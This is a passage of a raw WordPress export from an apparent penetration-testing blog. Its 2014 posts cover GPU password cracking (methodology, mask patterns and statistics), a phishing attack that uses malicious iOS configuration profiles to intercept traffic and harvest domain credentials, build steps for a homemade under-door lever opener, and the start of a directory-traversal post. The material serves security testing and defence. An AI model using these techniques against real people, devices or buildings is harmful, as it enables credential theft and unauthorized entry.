three sets of domain hashes that added up to 26,692 hashes. Two of the three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated. 
Just like last quarter, it wasn’t a huge advantage. Of the hashes, 11,776 were duplicates, leaving 14,916 unique hashes. Of the 26,692 hashes, we were able to crack 21,955 (82.25%). Cracked Password Length Breakdown: As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. It’s also been the peak every quarter this year. It should also be noted that we’re able to get through the entire eight character keyspace in about two and a half days, which may be influencing the peak. Some interesting finds:
  • Most Common Password (1120 instances): A Client Specific Default Account Password
  • Longest Password: jesusitrustinyou@123 (20 characters)
  • Most Common Length (8,656 instances): 8 characters
  • Instances of “Summer2014”: 394
  • Instances of “Spring123”: 300
  • Instances of “Summer123”: 262
  • Instances of “Summer14”: 163
  • Instances of “password” (full word, case-insensitive): 251
  • Blank passwords: 348
  • Top mask pattern: ?u?l?l?l?d?d?d?d?s (1,415 instances)
So far this year, we’ve collected 60,638 hashes to crack. Of those, we’ve been able to crack 51,393 (84.75%). Here’s the length breakdown for the year, so far. Some more interesting finds:
  • Most Common Password – (that we can print here): Password1 (1410 instances)
  • Longest Passwords: Six different passwords were 20 characters
  • Most Common Length (22,994 instances): 8 characters
  • Instances of “password” (full word, case-insensitive): 2,926
  • Instances of “SEASON2014”: 1,404
    • -SEASON = spring, summer, fall, winter (case-insensitive)
  • Top Mask Pattern: ?u?l?l?l?l?l?d?d (3,068 instances)
I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download them here – Q3 Hcmask File - Q1,Q2,Q3 Hcmask File. I plan on wrapping this up next quarter, so check back to see how this mask files have changed and to see how well we’ve done across the year. For more information on how we built our GPU-enhanced password cracking box, check out our slides. For a general outline of our password cracking methodology check out this post. [post_title] => Cracking Stats for Q3 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-q3-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:43:19 [post_modified_gmt] => 2021-06-08 21:43:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1922 [menu_order] => 692 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [52] => WP_Post Object ( [ID] => 1106 [post_author] => 10 [post_date] => 2014-10-06 07:00:38 [post_date_gmt] => 2014-10-06 07:00:38 [post_content] =>

Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about the actual trade-offs of using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

Windows Hashes

The LAN Manager (or LM) hashing algorithm is the legacy way of storing password hashes in Windows. The replacement (NTLM) has been around for quite a while, but we still see the LM hashing algorithm being used on both local and domain password hashes.

The LM hash format breaks passwords into two parts. Each part can be up to seven characters long. If the password is seven characters or less, the second part is just a blank LM hash. All of the alphabetical characters are converted to upper case, as the LM hash standard is case insensitive. Case sensitivity is stored in the NTLM hashes.

In the example below, the hash for the password “QBMzftvX” is broken into two parts (QBMZFTV and X). You will also see that all of the cleartext characters of these LM hashes are upper-cased.
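To make the splitting concrete, here's a minimal Python sketch of just the case-folding and halving steps (illustrative only; the real algorithm then uses each 7-character half as a DES key to encrypt a constant value, which is what produces the stored hash bytes):

```python
def lm_halves(password: str) -> tuple:
    """Split a password the way the LM algorithm does:
    uppercase it, null-pad it to 14 characters, and break it
    into two 7-character halves. (LM then DES-encrypts a
    constant with each half; that step is omitted here.)"""
    padded = password.upper().ljust(14, "\x00")
    return padded[:7], padded[7:14]

# The example from the post: "QBMzftvX" becomes QBMZFTV and X
first, second = lm_halves("QBMzftvX")
print(first, second.rstrip("\x00"))  # QBMZFTV X
```

Note that a password of seven characters or less leaves the entire second half as padding, which is why its stored LM half is the well-known "blank" value.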

Hashexample

For the purpose of this blog, I’ll only be covering the trade offs of using Rainbow Tables for LM hashes. There are NTLM Rainbow Tables, and they can be used with great success, but I won’t be covering the GPU/Rainbow Tables comparison for NTLM in this post.

Rainbow Tables

Traditionally, LM hashes have been attacked with Rainbow Tables. It’s easy to create large tables of these password/hash combinations for every possible LM hash, as you only have to create them for one to seven-character combinations. Once you’ve looked up the hash halves in the tables, you toggle cases on the letters to brute force the password for the case-sensitive NTLM hash. This method works well, but disk reads can be slow, and if your computer is busy doing other things, adding in LM table lookups may slow the rest of your system down. Some great advances have been made by multi-threading the table lookups. This ended up being one of the pain points in writing this blog, as I didn’t have the correct multi-threaded Rainbow Table format to use with rcrack_mt. The table lookups were also helped by the fact that I was using an SSD to house the Rainbow Tables. I included stats for rcrack_mt table lookups for comparison in the table at the end.

There are two major trade-offs with using Rainbow Tables. The primary one is disk space: the tables themselves can take up a fair amount of it. Disk space is relatively cheap now, but five years ago this was a much bigger deal. The second trade-off is the time it takes to initially generate the tables. If you are not getting the tables off of the internet (also time consuming), you could spend days (possibly months) generating them.

GPU Cracking

I really can’t give enough credit to the people working on the Hashcat projects. They do a great job with the software and we use it every day. We use oclHashcat to do GPU brute force attacks on the one to seven character LM hashes. Once cracked, the halves are reassembled and a toggle case attack is run with hashcat (CPU version). Using GPUs to do the brute forcing allows us to save some disk space that would typically be used by the LM tables, and it allows us to offload the cracking to our centralized system. Since we’ve scripted it all, I just pull the LM and NTLM hashes into our script and grab a cup of coffee. But does it save us any time?
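The toggle-case step can be sketched in a few lines of Python (a simplified illustration, not our actual tooling): given the upper-cased plaintext recovered from the LM halves, enumerate every case permutation; each candidate would then be hashed and compared against the NTLM hash.

```python
from itertools import product

def case_candidates(lm_plaintext: str):
    """Yield every upper/lower case permutation of an LM-cracked
    password. Non-alphabetic characters have only one form, so a
    password with n letters yields 2**n candidates."""
    options = [(c.upper(), c.lower()) if c.isalpha() else (c,)
               for c in lm_plaintext]
    for combo in product(*options):
        yield "".join(combo)

# Two alphabetic characters -> 2**2 = 4 candidates
print(list(case_candidates("AB1")))  # ['AB1', 'Ab1', 'aB1', 'ab1']
```

This is why cracking the LM halves first is such a head start: the remaining NTLM search space collapses from the full keyspace to at most 2^n case permutations.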

Hybrid GPU Rainbow Tables

There are programs (RainbowCrack) that allow for a hybrid attack that uses GPU acceleration to do the Rainbow table lookups. I’ve heard that these programs work well, but RainbowCrack only supports the GPU acceleration through Windows, so that means we won’t be using it on our GPU cracking rig.

The Breakdown

For this test, I generated a set of 100 LM/NTLM hashes from randomly generated passwords of various lengths (a mix of 6-14 character lengths). Cracking with Rainbow Tables was done from my Windows laptop (2.70GHz Intel i7, 16 GB RAM, SSD). GPU cracking was done on our GPU cracking box (5 GPUs).

Method                     | Cracked | Time
Rainbow Tables (OphCrack*) | 99/100  | 24 Minutes 5 Seconds
oclHashcat/CPU Hashcat     | 100/100 | 18 Minutes 56 Seconds
Rcracki (multithreaded**)  | 100/100 | 5 Minutes 40 Seconds

*OphCrack 3.6.0 run with the XP Special Tables

**Rcracki_mt running with 24 threads

So after all of this effort, I can’t totally justify saying that using oclHashcat/Hashcat is faster for cracking LM hashes, but given our setup, it’s still pretty fast. That being said, if you don’t have your own GPU cracking rig, you will definitely be better off using Rainbow tables, especially if you multi-thread it on a solid state drive.

[post_title] => LM Hash Cracking – Rainbow Tables vs GPU Brute Force [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lm-hash-cracking-rainbow-tables-vs-gpu-brute-force [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1106 [menu_order] => 698 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [53] => WP_Post Object ( [ID] => 1108 [post_author] => 10 [post_date] => 2014-08-18 07:00:48 [post_date_gmt] => 2014-08-18 07:00:48 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the second quarter of 2014 (and so far for this year). The plan is to continue doing this each quarter for the rest of the year to see how we did overall for the year. Please keep in mind that this is not an all encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to.

Q Hash Cracking Pie Chart

The sample for this quarter included three sets of domain hashes that added up to 23,898 hashes. All three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated, so it wasn’t a huge advantage. Of the hashes, 8,277 were duplicates, leaving 15,621 unique hashes. Of the 23,898 hashes, we were able to crack 21,465 (89.82%). Cracked Password Length Breakdown:

Q Hash Cracking Bar Chart

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some interesting finds:
  • Most Common Password (820 instances): Changem3
  • Longest Password: 20 characters
  • Most Common Length (10,897 instances): 8 characters
  • Instances of “password” (case-insensitive): 1,541
  • Instances of “spring2014” (case-insensitive): 111
  • Instances of “spring14” (case-insensitive): 93
  • Instances of “summer2014” (case-insensitive): 84
  • Instances of “summer14” (case-insensitive): 59
So far this year, we’ve collected 33,950 hashes to crack. Of those, we’ve been able to crack 29,077 (85.65%). Some more interesting finds:
  • Most Common Password (1274 instances): Password1
  • Longest Passwords: 20 characters – Two passwords based off of the name of the business group using them
  • Most Common Length (14,339 instances): 8 characters
  • Instances of “password” (case-insensitive): 2,675
  • Instances of “winter2014” (case-insensitive): 23
  • Instances of “winter14” (case-insensitive): 18
  • Instances of “spring2014” (case-insensitive): 102
  • Instances of “spring14” (case-insensitive): 91
I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download the files here: Top40_Q2 and Top40 Q1 and Q2. I plan on keeping up with this each quarter, so check back next quarter to see how these mask files have changed and to see how well we’ve done across the three quarters. For more information on how we built our GPU-enhanced password cracking box, check out our slides. For a general outline of our password cracking methodology, check out this post. [post_title] => Cracking Stats for Q2 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q2-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1108 [menu_order] => 699 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [54] => WP_Post Object ( [ID] => 1116 [post_author] => 10 [post_date] => 2014-06-09 07:00:21 [post_date_gmt] => 2014-06-09 07:00:21 [post_content] => How much can you trust your devices? In this blog post, we will cover a practical attack that utilizes the iPhone Configuration Utility, a malicious Mobile Device Management (MDM) server, and a little bit of social engineering to get data from iOS devices, capture HTTP and HTTPS web traffic, and possibly collect domain credentials.

The Scenario:

To start this off, we will be sending out a .mobileconfig file to iOS devices at the HACKME company. This .mobileconfig file is created with the iPhone Configuration Utility (shown below) and will set up iOS devices to use a specific proxy host when connected to a specific Wi-Fi network. This proxy will be used later to capture HTTP and HTTPS traffic. Additionally, we will configure trusted certificates and an MDM server to use for (malicious) device management. Our example will focus on getting users to install this .mobileconfig with a phishing email. The phishing email will come from support@hackme.com and will have the .mobileconfig file attached. The email will encourage the iPhone owners to install the .mobileconfig to maintain compliance with company policy. Once the target is phished and the profile is installed on their device, we will want their iOS device in range of our wireless access point. This could easily be done with a high powered Wi-Fi access point in the parking lot. If we want even closer access to our targets, we could send someone into the client building with a battery powered 3G/4G AP in a bag and have them run the attack from inside the building.

The Setup:

The first step in this attack is to set up our malicious .mobileconfig profile to send out with the phishing email. This .mobileconfig will have a default Wi-Fi network configured along with a proxy to use when connected to the Wi-Fi. For this demonstration, we will be showing screenshots from the Windows version of the iPhone Configuration Utility. Wi-Fi Network Setup (with proxy settings)

Mdm

If we are going to intercept HTTPS traffic, we are going to need a trusted root CA on the iOS device. This too can be done with the iPhone Configuration Utility. In this attack, we will be using the PortSwigger CA from the Burp proxy.

Mdm

This config will then be exported to a .mobileconfig file, and we will send it along with the phishing email.

Mdm

The only downside to this is the signing of the profile. As of now, it can be a pain to get these properly signed using Windows. The Apple device management utility allows you to specify certs to use for signing, so I would recommend using the Apple tool for exporting your profiles. Overall, this won't be too big of a deal, assuming that people will not care about the "Not Verified" warning on the profile.

Mdm

Once the user has the profile installed on their iOS device, we need to get in Wi-Fi range of their device. For simplicity's sake, let's say that we just tailgated into the office and set up shop in an empty office or conference room. A capture device, such as a Raspberry Pi or laptop, and wireless AP (with 4G internet access) will be with us and running off of battery power. The capture device could also easily sit in a bag (purse, backpack, etc.) in an unlocked file cabinet. For our safety, we will lock the cabinet and take the key with us. We could then leave the devices for later retrieval, or have the capture device phone home for us to access the proxy logs remotely. At this point, there should be some decent data coming through on the Wi-Fi traffic, but our main goal for this demo is to capture the Exchange ActiveSync request. It looks like this:

Mdm

You'll see the Authorization token in the request header. This is the base64-encoded domain credentials (HACKME\hackmetest:P@ssword123!) for the iPhone user. Now that we have domain credentials, the rest of the escalation just got a lot easier. We also set up a web clip to deploy to the iOS device. This fake app will be handy in the event that we're unable to get the ActiveSync credentials. The app will look like a branded HACKME company application that opens a web page in Safari containing a login prompt. The malicious site will store any entered credentials and fail on attempts to log in. So even if we're not on the same Wi-Fi network, we might be able to get credentials.
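Recovering the credentials from that header takes one line. Here's a quick Python sketch built around the example credentials above (the header value is reconstructed for illustration, not captured output):

```python
import base64

# A Basic Authorization header carries "user:password", base64-encoded.
# Built here from the example credentials in this post.
creds = r"HACKME\hackmetest:P@ssword123!"
header_value = "Basic " + base64.b64encode(creds.encode()).decode()

# An attacker proxying the ActiveSync request just reverses the encoding:
decoded = base64.b64decode(header_value.split(" ", 1)[1]).decode()
print(decoded)  # HACKME\hackmetest:P@ssword123!
```

Base64 is an encoding, not encryption, so anyone who can see the request (for example, through the malicious proxy configured earlier) can trivially recover the cleartext credentials.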

Mdm

One additional item to think about is that these profiles do not have to be deployed via email. If an attacker has access to an unlocked device and the passcode, they may be able to install the profile to the iOS device via USB. This attack can be particularly applicable to kiosk iOS devices that allow physical access to their lightning/30-pin connectors. Finally, all of this can be continually manipulated if you set up an MDM server for the device to connect to, but we'll save that for another blog.

Conclusion

Don't leave device management up to your users. If you are using iOS devices in your environment, lock the devices down and prevent users from installing their own configurations. More importantly, go and configure your company devices before an attacker does it for you. [post_title] => Malicious MobileConfigs [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => malicious-mobile-configs [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:52 [post_modified_gmt] => 2021-06-08 21:48:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1116 [menu_order] => 707 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [55] => WP_Post Object ( [ID] => 1117 [post_author] => 10 [post_date] => 2014-06-02 07:00:50 [post_date_gmt] => 2014-06-02 07:00:50 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the first quarter of 2014. The plan is to do this again each quarter for the rest of the year to see how we did overall for the year. There was a relatively small sample for this quarter: just three sets of domain hashes that added up to 10,050 hashes. We are frequently in environments with twice as many users (20k and up), so this is a pretty limited set. One of these sets had LM hashes stored along with the NTLM hashes, making our cracking efforts a little bit easier. Of these hashes, 2,583 were duplicates, leaving 7,184 unique hashes. Of the 10,050 hashes, we were able to crack 7,510 (74.73%).

Q1 Cracking Hashes

Cracked Password Length Breakdown:

Cracked Password

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some more interesting finds:
  • Most Common Password (606 instances): Password1
  • Longest Password: 19 characters - visualmerchandising
  • Most Common Length (3,356 instances): 8 characters
  • Instances of “password” (case-insensitive): 122
  • Instances of [ClientName] (case-insensitive, no modifications, and redacted for obvious reasons): 284
  • Instances of “winter2014” (case-insensitive): 3
  • Instances of “winter14” (case-insensitive): 4
  • Instances of “spring2014” (case-insensitive): 5
  • Instances of “spring14” (case-insensitive): 8
In terms of effort that we put in on each of these hashes, we ran our typical twenty-four hour process on each of the hash files during each of the pentests. Since we keep a dictionary of all of the previously cracked hashes, this made it easier to re-run some of the cracking efforts with the already cracked hashes as a start. We added in some additional cracking time to really go after these hashes, but that was mostly brute force effort. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. You can download it here - Q1Masks. I plan on keeping up with this each quarter, so check back in July to see how this mask file has changed by second quarter and how well we've done over the first half of the year. For more information on how we built our GPU-enhanced password cracking box, check out this presentation we recently did at Secure360: GPU Cracking - On The Cheap For a general outline of our password cracking methodology check out this post: GPU Password Cracking – Building a Better Methodology [post_title] => Cracking Stats for Q1 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q1-2014 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:38 [post_modified_gmt] => 2021-04-13 00:05:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1117 [menu_order] => 708 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [56] => WP_Post Object ( [ID] => 1124 [post_author] => 10 [post_date] => 2014-03-15 07:00:38 [post_date_gmt] => 2014-03-15 07:00:38 [post_content] => In an attempt to speed up our password cracking process, we have run a number of tests to better match our guesses with the passwords that are being used by our clients. 
This is by no means a definitive cracking methodology, as it will probably change next month, but here's a look at what worked for us on a recent cracking test. For a little background, these hashes were pulled from a domain controller in the last six months. The DC still had some hashes stored in the older LanManager (LM) format in addition to NTLM. The password cracking process is also helped by using any cleartext passwords, recovered during the penetration test, as a dictionary. For this sample, there were:
  • 1000 total hashes (159 LM/NTLM, 841 NTLM-Only)
  • 828 unique hashes
  • 172 accounts with duplicate* passwords (*shared with one or more accounts)
Since LM hashes are weaker, we cracked those first. Initial attacks cracked all of the LM/NTLM hashes, giving us a nice head start (130/828 unique hashes or 15.7% cracked) and a good list to feed back into our other attacks.

The General Methodology:

1. Use the dictionary and rules (Three minutes*) - Remaining Unique Hashes 698

Our dictionary file will typically catch the simple passwords. Our dictionary includes previously cracked passwords and most dictionary-word-based passwords will be in here. Add in a couple of simple rules (d3ad0ne, passwordspro, etc.) and this will catch a few of the "smarter" users with passwords like "1qaz2wsx%". As for the starting rules, we're currently using a mix of the default oclHashcat rules and some of the rules from KoreLogic's 2010 rule list - https://contest-2010.korelogic.com/rules-hashcat.html For our sample set of data, the dictionary attack (with a couple of rules) caught 372 of the remaining 698 hashes (53%).

2. Start with the masking attacks (Fifteen minutes*) - Remaining Unique Hashes 326

Using mask attacks allows us to match common password patterns. Based on the passwords that we've cracked in the past, we identified the fifty most common password patterns (that our clients use). Here's a handy perl script for identifying those patterns - https://pastebin.com/Sybzwf3K. Due to the excessive time that some of these masks take, we've trimmed our list down to forty-three masks. The masks are based on the types of characters being used in the password. They follow this format: ?u?l?l?l?l?d?d?d, which is equivalent to (1 Uppercase Character) (4 Lowercase Characters) (3 Decimals). A more practical example would be "Netsp199". For more information on masking attacks with oclHashcat, see https://hashcat.net/wiki/doku.php?id=mask_attack. Our top forty-three masks take about fifteen minutes to run through and caught (29/326) 8% of the remaining uncracked hashes from this sample.
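For readers who prefer Python, here's a rough sketch of the same idea as the linked perl script (an illustration, not the actual script): map each character of a cracked password to its mask class, then tally the masks across the whole cracked list.

```python
from collections import Counter

def hashcat_mask(password: str) -> str:
    """Build a hashcat-style mask (?u/?l/?d/?s) for one password."""
    out = []
    for ch in password:
        if ch.isupper():
            out.append("?u")
        elif ch.islower():
            out.append("?l")
        elif ch.isdigit():
            out.append("?d")
        else:
            out.append("?s")
    return "".join(out)

# Tally masks across a cracked-password list and print the most common,
# one mask per line, ready to drop into an .hcmask file.
cracked = ["Netsp199", "Password1", "Spring14!"]  # stand-in sample data
for mask, count in Counter(map(hashcat_mask, cracked)).most_common(40):
    print(mask, count)
```

Sorting by count and keeping the top forty-odd masks gives exactly the kind of trimmed mask list described above.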

3. Go back to the dictionary, this time with more ammunition (10 minutes*) - Remaining Unique Hashes 297

After we've cracked some of the passwords, we will want to funnel those results back into our mangling attacks. It's not hard for us to guess "!123Acme123!" after we've already cracked "Acme123". Just use the cracked passwords as your dictionary and repeat your rule-based attacks. This is also a good point to combine rules. oclHashcat allows you to combine rule sets to do a multi-vector mangle on your dictionary words. I've had pretty good luck with combining the best64 and the d3ad0neV3 rules, but your mileage may vary. Using this technique, we were able to crack four of the remaining 297 (1.3%) uncracked hashes.

4. Double your dictionary, double your fun? (20-35 minutes)

At this point, we're hitting our limits and need to start getting creative. Along with our hefty primary dictionary, we have a number of shorter dictionaries that are small enough that we can combine them to catch repeaters (e.g. "P@ssword P@ssword"). The attack is pretty simple: a word from the first dictionary will be appended with a word from the second. This style of attack is known as the combinator attack and is run with the -a 1 mode of oclHashcat. Additional rules can be applied to each dictionary to catch some common word delineation patterns ("Super-Secret!"). The example here would append a dash to the first word and an exclamation mark to the second. To be honest, this did not work for this sample set. Normally, we catch a few with this and it can be really handy in some scenarios, but that was not the case here. At this point, we will (typically) be about an hour into our cracking process. From the uniqued sample set, we were able to crack 530 of the 828 hashes (64%) within one hour. From the complete set (including duplicates), we were able to crack 701 of the 1,000 total hashes (70.1%).
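A minimal Python sketch of the combinator idea (illustrative only; in practice oclHashcat's -a 1 mode does this on the GPU, and the per-side rules are applied with its -j/-k options):

```python
# Every word from the first list is appended to every word from the
# second, with an optional per-side rule pair (here: append "-" to the
# left word and "!" to the right word, as in the "Super-Secret!" example).
left = ["Super", "P@ssword"]
right = ["Secret", "P@ssword"]

candidates = []
for a in left:
    for b in right:
        candidates.append(a + b)              # plain combination
        candidates.append(a + "-" + b + "!")  # with the delimiter rules
print(len(candidates))  # 8
```

This also shows why the attack catches repeaters: feeding the same short list in as both dictionaries generates "P@sswordP@ssword"-style candidates for free.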

5. When all else fails, brute force

Take a look at the company password policy. Seven characters is the minimum? That will take us about forty minutes to go through. Eight characters? A little over two and a half days. What does that mean for our cracking? It means we can easily go after any remaining seven-character passwords (where applicable). For those with eight-character minimums (or higher), it doesn't hurt for us to run a brute-force overnight on the hashes. Anything we get out of the brute-force can always be pulled back into the wordlist for the rule-based attacks. Given that a fair amount of our cracking happens during a well-defined project timeframe, we've found that it's best for us to limit the cracking efforts to about twenty-four hours. This prevents us from wasting too much time on a single hash and it frees up our cracking rig for our other projects. If we really need to crack a hash, we'll extend this time limit out, but a day is usually enough to catch most of the hashes we're trying to crack. With the overall efforts that we put in here (~24 hours), we ended up cracking 757 of the 1,000 hashes (75.7%). As luck would have it, I wrote up all of the stats for this blog and immediately proceeded to crack two new sets of NTLM hashes. One was close to 800 hashes (90% cracked) and another had over 5000 hashes (84% cracked). So your results will vary based on the hashes you're trying to crack. *All times are based on our current setup (four 7950 cards running oclHashcat 1.01). One final item to note: this is not the definitive password cracking methodology. This will probably change for us in the next year, month, week… People are always changing up how they create passwords and that will continue to influence the way we attack their hashes. I'll try to remember to come back to this next year and update with any changes. Did we miss any key cracking strategies? Let me know in the comments.
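The keyspace math behind those time estimates is easy to sanity-check. Here's a rough Python sketch; the 30 billion hashes/second rate is an assumed round number for illustration, not a benchmark of our rig:

```python
# Brute-force time scales with charset_size ** length. Using the full
# 95-character printable ASCII set and an assumed rate of 30 billion
# NTLM guesses per second (illustrative, not a measured figure):
rate = 30_000_000_000
for length in (7, 8):
    keyspace = 95 ** length
    seconds = keyspace / rate
    print(f"{length} chars: {keyspace:,} guesses, ~{seconds / 3600:.1f} hours")
```

At that assumed rate, seven characters come out to well under an hour and eight characters to multiple days, which is the same order of magnitude as the forty-minute and two-and-a-half-day figures above.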
[post_title] => GPU Password Cracking – Building a Better Methodology [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-password-cracking-building-a-better-methodology [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:45 [post_modified_gmt] => 2021-04-13 00:05:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1124 [menu_order] => 714 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [57] => WP_Post Object ( [ID] => 1128 [post_author] => 10 [post_date] => 2014-02-19 07:00:07 [post_date_gmt] => 2014-02-19 07:00:07 [post_content] => NetSPI Senior Security Consultant Karl Fosaaen recently wrote a couple of guest blogs for the upcoming Secure360 2014 Conference blog, you can find them here: If you enjoy these, be sure to make it out to Secure360 this year as Karl will be presenting as well as co-instructing a full-day class on "An Introduction to Penetration Testing" along with NetSPI Principal Consultant Scott Sutherland. To learn more about Secure360, Karl's presentations, or information on how to sign up for the training please visit the pages below: [post_title] => Karl Fosaaen Guest Blogs for Secure360 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => karl-fosaaen-guest-blogs-for-secure360 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:48 [post_modified_gmt] => 2021-04-13 00:05:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1128 [menu_order] => 718 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [58] => WP_Post Object ( [ID] => 1131 [post_author] => 10 [post_date] => 2014-01-27 07:00:46 [post_date_gmt] => 2014-01-27 07:00:46 [post_content] =>

This is a bit of a departure from our technical blogs, but today we're going to show you how to build your own door opening tool out of hardware store materials. For those who are not familiar with a "lever opener tool", it's a tool used by locksmiths (and others) to open doors from the outside. They're long hooks with a string attached. When the hook and string are looped over a door handle (think the L-shaped bar handles), tension is applied to the string and the hook pushes the door handle down.

Here's a professional one made by Keedex Inc.

Doortool

It's my understanding that you have to be a locksmith or an officer of the law in order to purchase/own one of these (Also might depend on your state). But who knows, Amazon is selling them. So as with any of our "how to" blogs, be careful with what you're doing, as it may not be totally legal in your area. TOOOL is a great place to look at for local lock pick laws.

Here's a basic MS Paint diagram of how the tool works.

Untitled

Hook the handle with the top of the tool and pull on the string. This should push the door handle down and you should be able to apply pressure to open the door. These are really simple to operate and can be really handy for entering locked doors. There are a couple of catches though. This will (potentially) not work if the door has a deadbolt. There are doors (see hotel rooms) that typically have linked deadbolts that will unlock when the handle is opened, but not every door is like that.

How to Make Your Own

We started with a couple of requirements on our end for making this:

  • Parts have to be readily available for purchase
  • The tool has to be non-damaging to the door
  • Tool should cost less than $50
    • The current cost of a Keedex K-22 on Amazon

Here's the parts list of everything that we bought.

Part Name                        | Price
Zinc Threaded Rod ¼”             | 6 Feet - $3.97
Vinyl Coated Steel Rope          | 6 Feet - $1.86
Rod Coupling Nut (optional)      | 3 pack - $1.24
Key Rings (optional)             | 2 pack - $0.97
Heat Shrink Tubing ¼” (optional) | 8 Feet - $4.97
Pre-Tax Total                    | $13.01

Assembly is pretty simple. If you do not use the heat shrink tubing, the threads may grip into your hands (and the door), so gloves are advised. On that note, it's best to use the tubing, as it will protect the door you are trying to enter from the threads on the rod.

Build Steps:

  1. If you're using the shrink tubing, slide the tubing over the threaded rod. The stuff we used was a pretty close fit, so we only heated up the two ends to seal it to our opener.
  2. Make your first bend about 4-5 inches from one of the ends. This bend should be an 85-90 degree angle, and will serve as the lever for pushing down the handle.
  3. Make your second bend at the base, opposite of your first bend. This will be a curved bend, versus a right angle. This will allow for easier rocking of the opener to bring the lever up to the handle.
  4. Add an additional bend to the base to act as a handle. This will give additional leverage over the opener. You may want to trim this part, you might not. It's up to you.
  5. Add the vinyl coated rope to the lever. This can be attached with electrical tape. We added the coupling nut at the connection point to make it easier to tape the rope down.

At this point, your opener should be ready to use. Make sure that there are no sharp or hard points on the opener, to help protect the door you're trying to open. We also added a handle from a foam sword we had laying around. That is also optional.

Here's the build process beautifully detailed in MS Paint.

Untitled

Here's our finished opener in action.

How to prevent the issue

There is no single fix that fully prevents this attack, but a few mitigations help. One simple fix is to add draft guards to the bottom of the door to prevent the tool from being placed under the door. Additionally, handles should not be visible through glass doors; being able to see the door handle makes the attack a lot easier. Door alarms and motion detectors should also be put in place to detect and alert on unauthorized entries.

[post_title] => Under the Door Tools – Opening Doors for Everyone [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => opening-doors-for-everyone [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:16 [post_modified_gmt] => 2021-06-08 21:51:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1131 [menu_order] => 721 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [59] => WP_Post Object ( [ID] => 1133 [post_author] => 10 [post_date] => 2014-01-13 07:00:41 [post_date_gmt] => 2014-01-13 07:00:41 [post_content] => For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.) Here's what a typical vulnerable request looks like:
GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
